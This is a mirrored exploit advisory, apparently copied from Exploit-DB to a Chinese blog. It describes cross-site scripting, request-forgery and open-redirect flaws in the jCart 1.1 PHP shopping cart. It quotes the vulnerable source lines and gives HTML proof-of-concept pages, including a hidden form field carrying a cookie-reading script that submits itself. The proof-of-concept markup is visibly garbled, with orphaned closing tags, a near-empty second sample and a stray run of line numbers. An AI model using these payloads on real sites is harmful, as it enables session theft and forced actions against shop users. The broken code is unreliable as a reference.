jCart 1.1 – Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities - 体验盒子

作者： p0deje

日期： 2010-10-01

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15171/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

<!--

Exploit Title: jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities

Date: 25.07.2010

Author: p0deje

Software Link: http://conceptlogic.com/jcart/

Version: <=1.1

Tested on: OS Independent

CVE : --

-->

<!--

Vulnerable code snippet:

jcart.php

-------------------------

line 251:$item_name = $_POST[$item_name];

...

line 256:$item_added = $this->add_item($item_id, $item_qty, $item_price, $item_name);

-------------------------

User-supplied input for variable $item_name isn't properly escaped.

Proof-of-Concept:

-->

<html>

<input name="my-item-name" value="<script>alert(document.cookie)</script>" type="hidden">

</form>

document.getElementById('payload').click()

</script>

</html>

<!--

Vulnerable code snippet

jcart-gateway.php:

-------------------------

line 41:header('Location: ' . $_POST['jcart_checkout_page']);

-------------------------

User-supplied data is not properly escaped before passing to header() function.

Proof-of-Concept:

-->

<html>

</form>

document.getElementById('payload').click()

</script>

</html>

<!--

All requests of jCart are vulnerable to CSRF.

Proof-of-Concept goes the same as for the first or the second vulnerability.

-->